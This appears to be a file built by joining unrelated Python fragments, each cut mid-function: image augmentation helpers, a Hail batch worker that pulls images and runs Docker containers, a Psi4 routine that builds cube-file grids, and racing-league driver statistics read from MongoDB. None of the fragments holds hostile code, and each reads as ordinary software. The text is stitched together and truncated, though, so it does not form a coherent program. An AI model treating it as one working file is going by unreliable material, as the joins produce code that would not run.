img = crop(img, top=augmentations[aug], left=augmentations[aug], right=augmentations[aug], bottom=augmentations[aug])
else:
img = crop(img, top=augmentations[aug][0], left=augmentations[aug][1], bottom=augmentations[aug][2], right=augmentations[aug][3])
elif aug == 'roll':
img = roll(img, vertical=augmentations[aug], horizontal=augmentations[aug])
elif aug == 'roll_v':
img = roll(img, vertical=augmentations[aug], horizontal=0)
elif aug == 'roll_h':
img = roll(img, vertical=0, horizontal=augmentations[aug])
elif aug == 'mean':
img = mean(img, augmentations[aug])
elif aug == 'noise':
img = noise(img, augmentations[aug])
elif aug == 'dropout':
img = dropout(img, augmentations[aug])
elif aug == 'blackout':
img = blackout(img, augmentations[aug])
elif aug == 'blur':
img = blur(img, augmentations[aug])
elif aug == 'brightness':
img = brightness(img, augmentations[aug])
elif aug == 'multiply':
img = randomMultiply(img, augmentations[aug])
elif aug == 'hue':
img = hue(img, augmentations[aug])
elif aug == 'lightness':
img = lightness(img, augmentations[aug])
elif aug == 'add':
img = add(img, augmentations[aug])
else:
pass
# Remove key so we avoid duplicate augmentations
del augmentations[aug]
# Count (even if we did not augment)
count -= 1
return img
def flip(img, flip_axis=1):
return cv2.flip(img, flip_axis)
def rotate(img, angle, zoom=1.0):
h, w = img.shape[:2]
M = cv2.getRotationMatrix2D((w / 2, h / 2), RANDOM.uniform(-angle, angle), zoom)
return cv2.warpAffine(img, M,(w, h))
def zoom(img, amount=0.33):
h, w = img.shape[:2]
M = cv2.getRotationMatrix2D((w / 2, h / 2), 0, 1 + RANDOM.uniform(0, amount))
return cv2.warpAffine(img, M,(w, h))
def crop(img, top=0.1, left=0.1, bottom=0.1, right=0.1):
h, w = img.shape[:2]
t_crop = max(1, int(h * RANDOM.uniform(0, top)))
l_crop = max(1, int(w * RANDOM.uniform(0, left)))
b_crop = max(1, int(h * RANDOM.uniform(0, bottom)))
r_crop = max(1, int(w * RANDOM.uniform(0, right)))
img = img[t_crop:-b_crop, l_crop:-r_crop]
img = squeeze(img, w, h)
return img
def roll(img, vertical=0.1, horizontal=0.1):
# Vertical Roll
img = np.roll(img, int(img.shape[0] * RANDOM.uniform(-vertical, vertical)), axis=0)
# Horizontal Roll
img = np.roll(img, int(img.shape[1] * RANDOM.uniform(-horizontal, horizontal)), axis=1)
return img
def mean(img, normalize=True):
img = substractMean(img, True)
if normalize and not img.max() == 0:
img /= img.max()
return img
def noise(img, amount=0.05):
img += RANDOM.normal(0.0, RANDOM.uniform(0, amount**0.5), img.shape)
img = np.clip(img, 0.0, 1.0)
return img
def dropout(img, amount=0.25):
d = RANDOM.uniform(0, 1, img.shape)
d[d <= amount] = 0
d[d > 0] = 1
return img * d
def blackout(img, amount=0.25):
b_width = int(img.shape[1] * amount)
b_start = RANDOM.randint(0, img.shape[1] - b_width)
img[:, b_start:b_start + b_width] = 0
return img
def blur(img, kernel_size=3):
return cv2.blur(img, (kernel_size, kernel_size))
def brightness(img, amount=0.25):
img *= RANDOM.uniform(1 - amount, 1 + amount)
img = np.clip(img, 0.0, 1.0)
return img
def randomMultiply(img, amount=0.25):
img *= RANDOM.uniform(1 - amount, 1 + amount, size=img.shape)
img = np.clip(img, 0.0, 1.0)
return img
def hue(img, amount=0.1):
try:
# Only works with BGR images
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv[:, :, 0] *= RANDOM.uniform(1 - amount, 1 + amount)
hsv[:, :, 0].clip(0, 360)
img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
except:
pass
return img
def lightness(img, amount=0.25):
try:
# Only works with BGR images
lab = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
lab[:, :, 0] *= RANDOM.uniform(1 - amount, 1 + amount)
lab[:, :, 0].clip(0, 255)
img = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
except:
pass
return img
def add(img, items):
# Choose one item from List
index = RANDOM.randint(len(items))
# Open and resize | |
from typing import Optional
import os
import json
import sys
import re
import logging
import asyncio
import random
import traceback
import base64
import uuid
import shutil
import aiohttp
import aiohttp.client_exceptions
from aiohttp import web
import async_timeout
import concurrent
import aiodocker
from aiodocker.exceptions import DockerError
import google.oauth2.service_account
from hailtop.utils import (time_msecs, request_retry_transient_errors,
sleep_and_backoff, retry_all_errors, check_shell,
CalledProcessError, check_shell_output, is_google_registry_image,
find_spark_home)
from hailtop.httpx import client_session
from hailtop.batch_client.parse import (parse_cpu_in_mcpu, parse_image_tag,
parse_memory_in_bytes, parse_storage_in_bytes)
from hailtop.batch.hail_genetics_images import HAIL_GENETICS, HAIL_GENETICS_IMAGES
from hailtop import aiotools
# import uvloop
from hailtop.config import DeployConfig
from hailtop.hail_logging import configure_logging
from ..utils import (adjust_cores_for_memory_request, cores_mcpu_to_memory_bytes,
adjust_cores_for_packability, adjust_cores_for_storage_request,
cores_mcpu_to_storage_bytes, storage_gib_to_bytes)
from ..semaphore import FIFOWeightedSemaphore
from ..log_store import LogStore
from ..globals import HTTP_CLIENT_MAX_SIZE, STATUS_FORMAT_VERSION
from ..batch_format_version import BatchFormatVersion
from ..worker_config import WorkerConfig
from ..public_gcr_images import public_gcr_images
from .flock import Flock
# uvloop.install()
configure_logging()
log = logging.getLogger('batch-worker')
MAX_DOCKER_IMAGE_PULL_SECS = 20 * 60
MAX_DOCKER_WAIT_SECS = 5 * 60
MAX_DOCKER_OTHER_OPERATION_SECS = 1 * 60
CORES = int(os.environ['CORES'])
NAME = os.environ['NAME']
NAMESPACE = os.environ['NAMESPACE']
# ACTIVATION_TOKEN
IP_ADDRESS = os.environ['IP_ADDRESS']
BATCH_LOGS_BUCKET_NAME = os.environ['BATCH_LOGS_BUCKET_NAME']
INSTANCE_ID = os.environ['INSTANCE_ID']
PROJECT = os.environ['PROJECT']
PUBLIC_GCR_IMAGES = public_gcr_images(PROJECT)
WORKER_CONFIG = json.loads(base64.b64decode(os.environ['WORKER_CONFIG']).decode())
MAX_IDLE_TIME_MSECS = int(os.environ['MAX_IDLE_TIME_MSECS'])
WORKER_DATA_DISK_MOUNT = os.environ['WORKER_DATA_DISK_MOUNT']
BATCH_WORKER_IMAGE = os.environ['BATCH_WORKER_IMAGE']
log.info(f'CORES {CORES}')
log.info(f'NAME {NAME}')
log.info(f'NAMESPACE {NAMESPACE}')
# ACTIVATION_TOKEN
log.info(f'IP_ADDRESS {IP_ADDRESS}')
log.info(f'BATCH_LOGS_BUCKET_NAME {BATCH_LOGS_BUCKET_NAME}')
log.info(f'INSTANCE_ID {INSTANCE_ID}')
log.info(f'PROJECT {PROJECT}')
log.info(f'WORKER_CONFIG {WORKER_CONFIG}')
log.info(f'MAX_IDLE_TIME_MSECS {MAX_IDLE_TIME_MSECS}')
log.info(f'WORKER_DATA_DISK_MOUNT {WORKER_DATA_DISK_MOUNT}')
worker_config = WorkerConfig(WORKER_CONFIG)
assert worker_config.cores == CORES
deploy_config = DeployConfig('gce', NAMESPACE, {})
docker: Optional[aiodocker.Docker] = None
port_allocator: Optional['PortAllocator'] = None
worker: Optional['Worker'] = None
class PortAllocator:
def __init__(self):
self.ports = asyncio.Queue()
port_base = 46572
for port in range(port_base, port_base + 10):
self.ports.put_nowait(port)
async def allocate(self):
return await self.ports.get()
def free(self, port):
self.ports.put_nowait(port)
def docker_call_retry(timeout, name):
async def wrapper(f, *args, **kwargs):
delay = 0.1
while True:
try:
return await asyncio.wait_for(f(*args, **kwargs), timeout)
except DockerError as e:
# 408 request timeout, 503 service unavailable
if e.status == 408 or e.status == 503:
log.warning(f'in docker call to {f.__name__} for {name}, retrying', stack_info=True, exc_info=True)
# DockerError(500, 'Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
# DockerError(500, 'error creating overlay mount to /var/lib/docker/overlay2/545a1337742e0292d9ed197b06fe900146c85ab06e468843cd0461c3f34df50d/merged: device or resource busy'
# DockerError(500, 'Get https://gcr.io/v2/: dial tcp: lookup gcr.io: Temporary failure in name resolution')
elif e.status == 500 and ("request canceled while waiting for connection" in e.message
or re.match("error creating overlay mount.*device or resource busy", e.message)
or "Temporary failure in name resolution" in e.message):
log.warning(f'in docker call to {f.__name__} for {name}, retrying', stack_info=True, exc_info=True)
else:
raise
except (aiohttp.client_exceptions.ServerDisconnectedError, asyncio.TimeoutError):
log.warning(f'in docker call to {f.__name__} for {name}, retrying', stack_info=True, exc_info=True)
delay = await sleep_and_backoff(delay)
return wrapper
async def create_container(config, name):
delay = 0.1
error = 0
async def handle_error(e):
nonlocal error, delay
error += 1
if error < 10:
delay = await sleep_and_backoff(delay)
return
raise ValueError('encountered {error} failures in create_container; aborting') from e
while True:
try:
return await docker.containers.create(config, name=name)
except DockerError as e:
# 409 container with name already exists
if e.status == 409:
try:
delay = await sleep_and_backoff(delay)
return await docker.containers.get(name)
except DockerError as eget:
# 404 No such container
if eget.status == 404:
await handle_error(eget)
continue
# No such image: gcr.io/...
if e.status == 404 and 'No such image' in e.message:
await handle_error(e)
continue
raise
async def start_container(container):
try:
return await container.start()
except DockerError as e:
# 304 container has already started
if e.status == 304:
return
if e.status == 500 and e.message == 'OCI runtime start failed: container process is already dead: unknown':
log.info(f'restarting container {container}')
return await container.restart()
raise
async def stop_container(container):
try:
return await container.stop()
except DockerError as e:
# 304 container has already stopped
if e.status == 304:
return
raise
async def delete_container(container, *args, **kwargs):
try:
return await container.delete(*args, **kwargs)
except DockerError as e:
# 404 container does not exist
# 409 removal of container is already in progress
if e.status in (404, 409):
return
raise
class JobDeletedError(Exception):
pass
class JobTimeoutError(Exception):
pass
class ContainerStepManager:
def __init__(self, container, name, state):
self.container = container
self.state = state
self.name = name
self.timing = None
self._deleted = False
async def __aenter__(self):
if self.container.job.deleted:
self._deleted = True
raise JobDeletedError()
if self.state:
log.info(f'{self.container} state changed: {self.container.state} => {self.state}')
self.container.state = self.state
self.timing = {}
self.timing['start_time'] = time_msecs()
self.container.timing[self.name] = self.timing
async def __aexit__(self, exc_type, exc, tb):
if self._deleted:
return
finish_time = time_msecs()
self.timing['finish_time'] = finish_time
start_time = self.timing['start_time']
self.timing['duration'] = finish_time - start_time
def worker_fraction_in_1024ths(cpu_in_mcpu):
return 1024 * cpu_in_mcpu // (CORES * 1000)
def user_error(e):
if isinstance(e, DockerError):
if e.status == 404 and 'pull access denied' in e.message:
return True
if e.status == 400 and 'executable file not found' in e.message:
return True
return False
class Container:
def __init__(self, job, name, spec):
self.job = job
self.name = name
self.spec = spec
repository, tag = parse_image_tag(self.spec['image'])
if not tag:
log.info(f'adding latest tag to image {self.spec["image"]} for {self}')
tag = 'latest'
if repository in HAIL_GENETICS_IMAGES:
repository_name_without_prefix = repository[len(HAIL_GENETICS):]
repository = f'gcr.io/{PROJECT}/{repository_name_without_prefix}'
self.repository = repository
self.tag = tag
self.image = self.repository + ':' + self.tag
self.port = self.spec.get('port')
self.host_port = None
self.timeout = self.spec.get('timeout')
self.container = None
self.state = 'pending'
self.error = None
self.timing = {}
self.container_status = None
self.log = None
self.overlay_path = None
def container_config(self):
weight = worker_fraction_in_1024ths(self.spec['cpu'])
host_config = {
'CpuShares': weight,
'Memory': self.spec['memory'],
'BlkioWeight': min(weight, 1000)
}
config = {
"AttachStdin": False,
"AttachStdout": False,
"AttachStderr": False,
"Tty": False,
'OpenStdin': False,
'Cmd': self.spec['command'],
'Image': self.image,
'Entrypoint': ''
}
env = self.spec.get('env', [])
if self.port is not None:
assert self.host_port is not None
config['ExposedPorts'] = {
f'{self.port}/tcp': {}
}
host_config['PortBindings'] = {
f'{self.port}/tcp': [{
'HostIp': '',
'HostPort': str(self.host_port)
}]
}
env = list(env)
env.append(f'HAIL_BATCH_WORKER_PORT={self.host_port}')
env.append(f'HAIL_BATCH_WORKER_IP={IP_ADDRESS}')
volume_mounts = self.spec.get('volume_mounts')
if volume_mounts:
host_config['Binds'] = volume_mounts
if env:
config['Env'] = env
network = self.spec.get('network')
if network is None:
network = 'public'
host_config['NetworkMode'] = network # not documented, I used strace to inspect the packets
config['HostConfig'] = host_config
return config
def step(self, name, **kwargs):
state = kwargs.get('state', name)
return ContainerStepManager(self, name, state)
async def get_container_status(self):
if not self.container:
return None
try:
c = await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(self.container.show)
except DockerError as e:
if e.status == 404:
return None
raise
cstate = c['State']
status = {
'state': cstate['Status'],
'started_at': cstate['StartedAt'],
'finished_at': cstate['FinishedAt'],
'out_of_memory': cstate['OOMKilled']
}
cerror = cstate['Error']
if cerror:
status['error'] = cerror
else:
status['exit_code'] = cstate['ExitCode']
return status
async def ensure_image_is_pulled(self, auth=None):
try:
await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
docker.images.get, self.image)
except DockerError as e:
if e.status == 404:
await docker_call_retry(MAX_DOCKER_IMAGE_PULL_SECS, f'{self}')(
docker.images.pull, self.image, auth=auth)
def current_user_access_token(self):
key = base64.b64decode(self.job.gsa_key['key.json']).decode()
return {'username': '_json_key', 'password': key}
async def batch_worker_access_token(self):
async with aiohttp.ClientSession(raise_for_status=True, timeout=aiohttp.ClientTimeout(total=60)) as session:
async with await request_retry_transient_errors(
session, 'POST',
'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token',
headers={'Metadata-Flavor': 'Google'}) as resp:
access_token = (await resp.json())['access_token']
return {'username': 'oauth2accesstoken', 'password': access_token}
async def run(self, worker):
try:
async with self.step('pulling'):
is_gcr_image = is_google_registry_image(self.image)
is_public_gcr_image = self.repository in PUBLIC_GCR_IMAGES
if not is_gcr_image:
await self.ensure_image_is_pulled()
elif is_public_gcr_image:
auth = await self.batch_worker_access_token()
await self.ensure_image_is_pulled(auth=auth)
else:
# Pull to verify this user has access to this
# image.
# FIXME improve the performance of this with a
# per-user image cache.
auth = self.current_user_access_token()
await docker_call_retry(MAX_DOCKER_IMAGE_PULL_SECS, f'{self}')(
docker.images.pull, self.image, auth=auth)
if self.port is not None:
async with self.step('allocating_port'):
self.host_port = await port_allocator.allocate()
async with self.step('creating'):
config = self.container_config()
log.info(f'starting {self}')
self.container = await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
create_container, config, name=f'batch-{self.job.batch_id}-job-{self.job.job_id}-{self.name}')
c = await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(self.container.show)
merged_overlay_path = c['GraphDriver']['Data']['MergedDir']
assert merged_overlay_path.endswith('/merged')
self.overlay_path = merged_overlay_path[:-7].replace(WORKER_DATA_DISK_MOUNT, '/host')
os.makedirs(f'{self.overlay_path}/', exist_ok=True)
async with Flock('/xfsquota/projects', pool=worker.pool):
with open('/xfsquota/projects', 'a') as f:
f.write(f'{self.job.project_id}:{self.overlay_path}\n')
await check_shell_output(f'xfs_quota -x -D /xfsquota/projects -P /xfsquota/projid -c "project -s {self.job.project_name}" /host/')
async with self.step('starting'):
await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
start_container, self.container)
timed_out = False
async with self.step('running'):
try:
async with async_timeout.timeout(self.timeout):
await docker_call_retry(MAX_DOCKER_WAIT_SECS, f'{self}')(self.container.wait)
except asyncio.TimeoutError:
timed_out = True
self.container_status = await self.get_container_status()
async with self.step('uploading_log'):
await worker.log_store.write_log_file(
self.job.format_version, self.job.batch_id,
self.job.job_id, self.job.attempt_id, self.name,
await self.get_container_log())
async with self.step('deleting'):
await self.delete_container()
if timed_out:
raise JobTimeoutError(f'timed out after {self.timeout}s')
if 'error' in self.container_status:
self.state = 'error'
elif self.container_status['exit_code'] == 0:
self.state = 'succeeded'
else:
self.state = 'failed'
except Exception as e:
if not isinstance(e, (JobDeletedError, JobTimeoutError)):
log.exception(f'while running {self}')
self.state = 'error'
self.error = traceback.format_exc()
finally:
await self.delete_container()
async def get_container_log(self):
logs = await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
self.container.log, stderr=True, stdout=True)
self.log = "".join(logs)
return self.log
async def get_log(self):
if self.container:
return await self.get_container_log()
return self.log
async def delete_container(self):
if self.overlay_path:
path = self.overlay_path.replace('/', r'\/')
async with Flock('/xfsquota/projects', pool=worker.pool):
await check_shell(f"sed -i '/:{path}/d' /xfsquota/projects")
if self.container:
try:
log.info(f'{self}: deleting container')
await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
stop_container, self.container)
# v=True deletes anonymous volumes created by the container
await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
delete_container, self.container, v=True)
self.container | |
<filename>pdft/libcubeprop.py
# Copyright (c) 2007-2019 The Psi4 Developers.
# Copyright (c) 2014-2018, The Psi4NumPy Developers.
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Psi4NumPy Developers nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
TO BE FINISHED: ARBITRARY GIVEN GRID.
"""
import numpy as np
import psi4
def build_grid(wfn, L, D):
"""
Creates origin and extent of the cube file
Parameters
----------
wfn : psi4.core.Wavefunction
Wavefunction object from Psi4 energy calculation
L : List
Spacial Extent for x,y,z directions
D : List
Grid Spacing in bohrs for x,y,z directions
Returns
-------
O : List
Origin for the cubefile
N : List
Number of points for each coordinate
"""
geometry = wfn.molecule().full_geometry().np
Xmin = np.zeros(3)
Xmax = np.zeros(3)
Xdel = np.zeros(3)
N = np.zeros(3)
O = np.zeros(3)
for k in [0, 1, 2]:
Xmin[k] = Xmax[k] = geometry[0, k]
for atom in range(len(geometry)):
Xmin[k] = geometry[atom, k] if Xmin[k] > geometry[atom, k] else Xmin[k]
Xmax[k] = geometry[atom, k] if Xmax[k] < geometry[atom, k] else Xmax[k]
Xdel[k] = Xmax[k] - Xmin[k]
N[k] = int((Xmax[k] - Xmin[k] + 2.0 * L[k]) / D[k])
if D[k] * N[k] < (Xmax[k] - Xmin[k] + 2.0 * L[k]):
N[k] += 1
O[k] = Xmin[k] - (D[k] * N[k] - (Xmax[k] - Xmin[k])) / 2.0
return O, N
def populate_grid(wfn, O, N, D):
"""
Build cube grid
Parameters
----------
wfn : psi4.core.Wavefunction
Wavefunction object from Psi4 energy calculation
O : List
Origin for the cubefile
N : List
Number of points for each coordinate
D : List
Grid Spacing in bohrs for x,y,z directions
Returns
-------
block : List
Set of psi4.core.BlockOPoints for cube grid
points : psi4.core.RKSFunctions
nxyz : integer
number of points in each direction for rectangular grid
npoints : int
total number of points in grid
"""
epsilon = psi4.core.get_global_option("CUBIC_BASIS_TOLERANCE")
basis = psi4.core.BasisSet.build(wfn.molecule(), 'ORBITAL', wfn.basisset().name())
extens = psi4.core.BasisExtents(basis, epsilon)
npoints = (N[0]) * (N[1]) * (N[2])
x = np.zeros(int(npoints))
y = np.zeros(int(npoints))
z = np.zeros(int(npoints))
w = np.zeros(int(npoints))
max_points = psi4.core.get_global_option("CUBIC_BlOCK_MAX_POINTS")
nxyz = int(np.round(max_points ** (1 / 3)))
block = []
offset = 0
i_start = 0
j_start = 0
k_start = 0
x_plot, y_plot, z_plot = [], [], []
for i in range(i_start, int(N[0] + 1), nxyz):
ni = int(N[0]) - i if i + nxyz > N[0] else nxyz
for j in range(j_start, int(N[1] + 1), nxyz):
nj = int(N[1]) - j if j + nxyz > N[1] else nxyz
for k in range(k_start, int(N[2] + 1), nxyz):
nk = int(N[2]) - k if k + nxyz > N[2] else nxyz
x_in, y_in, z_in, w_in = [], [], [], []
block_size = 0
for ii in range(i, i + ni):
for jj in range(j, j + nj):
for kk in range(k, k + nk):
x[offset] = O[0] + ii * D[0]
y[offset] = O[1] + jj * D[1]
z[offset] = O[2] + kk * D[2]
w[offset] = D[0] * D[1] * D[2]
x_plot.append(x[offset])
y_plot.append(y[offset])
z_plot.append(z[offset])
x_in.append(x[offset])
y_in.append(y[offset])
z_in.append(z[offset])
w_in.append(w[offset])
offset += 1
block_size += 1
x_out = psi4.core.Vector.from_array(np.array(x_in))
y_out = psi4.core.Vector.from_array(np.array(y_in))
z_out = psi4.core.Vector.from_array(np.array(z_in))
w_out = psi4.core.Vector.from_array(np.array(w_in))
block.append(psi4.core.BlockOPoints(x_out, y_out, z_out, w_out, extens))
max_functions = 0
for i in range(max_functions, len(block)):
max_functions = max_functions if max_functions > len(block[i].functions_local_to_global()) else len(
block[i].functions_local_to_global())
points = psi4.core.RKSFunctions(basis, int(npoints), max_functions)
points.set_ansatz(0)
# return block, points, nxyz, npoints, [x_plot, y_plot, z_plot]
return block, points, nxyz, npoints
def add_density_vector_basis(npoints, points, block, array):
"""
Computes density in new grid from a array.
Parameters
----------
npoints: int
total number of points
points : psi4.core.RKSFunctions
block : list
Set of psi4.core.BlockOPoints for cube grid
matrix : psi4.core.Matrix
One-particle density matrix
Returns
-------
v : numpy array
Array with density values on the grid
"""
v = np.zeros(int(npoints))
x = np.zeros(int(npoints))
y = np.zeros(int(npoints))
z = np.zeros(int(npoints))
w = np.zeros(int(npoints))
matrix = psi4.core.Matrix.from_array(np.zeros((array.shape[0], array.shape[0])))
points.set_pointers(matrix)
# points_func = vpot.properties()[0]
# print(points.point_values().keys())
# Loop over the blocks
offset = 0
for i in range(len(block)):
# Obtain block information
this_block = block[i]
points.compute_points(this_block)
n_points = this_block.npoints()
lpos = this_block.functions_local_to_global()
offset += n_points
# Compute phi!
phi = np.array(points.basis_values()["PHI"])[:n_points, :len(lpos)]
# Build a local slice of D
lD = array[lpos]
# Copmute rho
v[offset - n_points:offset] = np.einsum('pm,m->p', phi, lD)
x[offset - n_points:offset] = this_block.x().np
y[offset - n_points:offset] = this_block.y().np
z[offset - n_points:offset] = this_block.z().np
w[offset - n_points:offset] = this_block.w().np
return v, [x, y, z, w]
def add_density_matrix_basis(npoints, points, block, matrix):
"""
Computes density in new grid
Parameters
----------
npoints: int
total number of points
points : psi4.core.RKSFunctions
block : list
Set of psi4.core.BlockOPoints for cube grid
matrix : Numpy array
One-particle density matrix
Returns
-------
v : numpy array
Array with density values on the grid
"""
v = np.zeros(int(npoints))
x = np.zeros(int(npoints))
y = np.zeros(int(npoints))
z = np.zeros(int(npoints))
w = np.zeros(int(npoints))
psi_matrix = psi4.core.Matrix.from_array(matrix)
points.set_pointers(psi_matrix)
rho = points.point_values()["RHO_A"]
offset = 0
for i in range(len(block)):
points.compute_points(block[i])
n_points = block[i].npoints()
offset += n_points
v[offset - n_points:offset] = 0.5 * rho.np[:n_points]
x[offset - n_points:offset] = block[i].x().np
y[offset - n_points:offset] = block[i].y().np
z[offset - n_points:offset] = block[i].z().np
w[offset - n_points:offset] = block[i].w().np
return v, [x, y, z, w]
def compute_isocontour_range(v, npoints):
"""
Computes threshold for isocontour range
Parameters
----------
v : numpy array
Array with scalar values on the grid
npopints : int
Total number of points on the grid
Returns
-------
values : list
Value of positive and negative isocontour
cumulative_threshold: float
"""
cumulative_threshold = 0.85
sum_weight = 0
# Store the points with their weights and compute the sum of weights
sorted_points = np.zeros((int(npoints), 2))
for i in range(0, int(npoints)):
value = v[i]
weight = np.power(np.abs(value), 1.0)
sum_weight += weight
sorted_points[i] = [weight, value]
# Sort the points
sorted_points = sorted_points[np.argsort(sorted_points[:, 1])][::-1]
# Determine the positve and negative bounds
sum = 0
negative_isocontour = 0.0
positive_isocontour = 0.0
for i in range(len(sorted_points)):
if sorted_points[i, 1] >= 0:
positive_isocontour = sorted_points[i, 1]
if sorted_points[i, 1] < 0:
negative_isocontour = sorted_points[i, 1]
sum += sorted_points[i, 0] / sum_weight
if sum > cumulative_threshold:
break
values = [positive_isocontour, negative_isocontour]
return values, cumulative_threshold
def write_cube_file(wfn, O, N, D, nxyz, npoints, v, name, header):
# Reorder the grid
v2 = np.zeros_like(v)
offset = 0
for istart in range(0, int(N[0] + 1), nxyz):
ni = int(N[0]) - istart if istart + nxyz > N[0] else nxyz
for jstart in range(0, int(N[1] + 1), nxyz):
nj = int(N[1]) - jstart if jstart + nxyz > N[1] else nxyz
for kstart in range(0, int(N[2] + 1), nxyz):
nk = int(N[2]) - kstart if kstart + nxyz > N[2] else nxyz
for i in range(istart, istart + ni):
for j in range(jstart, jstart + nj):
for k in range(kstart, kstart + nk):
index = i * (N[1]) | |
DESCENDING)])
#pprint(driver)
#pprint(user)
if not season_driver:
season_driver = {'top10': {
'1': 0, '2': 0, '3': 0},
'points': 'TBD',
'incidents': 0,
'pole': 0,
'unique_name': "",
'races_done': 0
}
season_driver['top10']['1'] = 0
season_driver['top10']['2'] = 0
season_driver['top10']['3'] = 0
season_driver['classimg'] = ''
if not driver:
driver = {'top10': {
'1': 0, '2': 0, '3': 0},
'points': 'TBD',
'incidents': 0,
'pole': 0,
'unique_name': "",
'races_done': 0
}
driver['top10']['1'] = 0
driver['top10']['2'] = 0
driver['top10']['3'] = 0
driver['classimg'] = ''
else:
driver['signedin'] = datetime.fromtimestamp(int(user['email_confirmed_on'])).strftime('%d-%m-%Y')
driver['first'] = driver['top10']['1']
driver['top3'] = int(driver['top10']['1']) + int(driver['top10']['2']) + int(driver['top10']['3'])
if 'incident_ave' in driver:
driver['incidents'] = round((float(driver['incident_ave'])), 3)
#print('round', round((float(driver['incident_ave'])), 3))
else:
driver['incidents'] = round((float(driver['incidents'] / driver['races_done'])), 3)
#print('round', driver['incidents'])
#print(driver['incidents'])
driver['classimg'] = driver['classimg']
if (type(driver['points']) == str):
driver['points'] = 'TBD'
else:
try:
driver['points'] = round(int(driver['points'], 3)) * 1000
except:
driver['points'] = round(driver['points'], 3) * 1000
#global data
top10list = []
ratinglabels = ['start']
ratingvalues = [0]
ratingrange = [0]
incidentlabels = ['start']
incidentvalues = [0]
incidentaverage = [0]
rankposition = [0]
ranklabels = ['start']
racenum = 0
racesList = []
if (driver['races_done'] > 0):
for k, v in driver['top10'].items():
top10list.append(v)
top10list.append(driver['pole'])
name = driver['unique_name']
hist_rating = db.HistRating.find({'result.steamID':user['steam_id']})
for rating in hist_rating:
if (hist_rating.count() > 4):
ratinglabels.append(rating['filename'])
result = rating['result']
for res in result:
if (res['steamID'] == user['steam_id']):
if (res['points'] <= 0):
ratingvalues.append(float(0))
ratingrange.append(float(0))
else:
ratingvalues.append(round(res['points']*1000, 2))
ratingrange.append(round((3* res['sigma'] + res['points']) * 1000))
hist_incidents = db.HistIncident.find({'result.steamID':user['steam_id']})
histlist = [0]
'''for incident in hist_incidents:
incidentlabels.append(incident['filename'])
incresult = incident['result']
for inc_res in incresult:
if (inc_res['steamID'] == user['steam_id']):
incidentvalues.append(round(inc_res['incidents'], 2))
racenum += 1
incidentaverage.append(round(inc_res['incidents'] / racenum, 2))'''
for incident in hist_incidents:
incidentlabels.append(incident['filename'])
incresult = incident['result']
for inc_res in incresult:
if (inc_res['steamID'] == user['steam_id']):
incidentvalues.append(round(inc_res['raceincidents'], 2))
histlist.append(inc_res['raceincidents'])
for hi in range(len(histlist)):
if hi < 5 and hi > 0:
incsum = sum(histlist[0:hi])
#print('0', hi, incsum)
incidentaverage.append(round(incsum/hi, 2))
elif hi == 0:
pass
else:
botsum = hi - 4
incsum = sum(histlist[botsum:hi+1])/5
#print(botsum, hi, incsum)
incidentaverage.append(round(incsum, 2))
hist_rank = db.HistRank.find()
for rank in hist_rank:
length = len(rank['positions'])
#id_in = False
for i in range(length):
if rank['positions'][i]['steamID'] == user['steam_id']:
ranklabels.append(rank['filename'])
#id_in = True
rankposition.append(rank['positions'][i]['rank_pos'])
#print(rankposition)
ranklabels_len= len(ranklabels)
ranklabels = ranklabels[ranklabels_len//3:]
rankposition = rankposition[ranklabels_len//3:]
#season data
seasontop10list = []
seasonratingvalues = []
seasonratingrange = []
seasonlabels = ['start']
seasonrankposition = []
seasonranklabels = ['start']
if season_driver['races_done'] > 0:
for k, v in season_driver['top10'].items():
seasontop10list.append(v)
seasontop10list.append(season_driver['pole'])
season_hist_rating = db.SeasonHistRating.find({'result.steamID':user['steam_id']})
for rating in season_hist_rating:
seasonlabels.append(rating['filename'])
season_hist_rank = db.SeasonHistRank.find()
for rank in season_hist_rank:
seasonranklabels.append(rank['filename'])
for label in ratinglabels:
if label in seasonlabels and label != 'start':
season_race = db.SeasonHistRating.find_one({'filename':label})['result']
for res in season_race:
if res['steamID'] == user['steam_id']:
if res['points'] <= 0:
seasonratingvalues.append(float(0))
seasonratingrange.append(float(0))
else:
seasonratingvalues.append(round(res['points']*1000, 2))
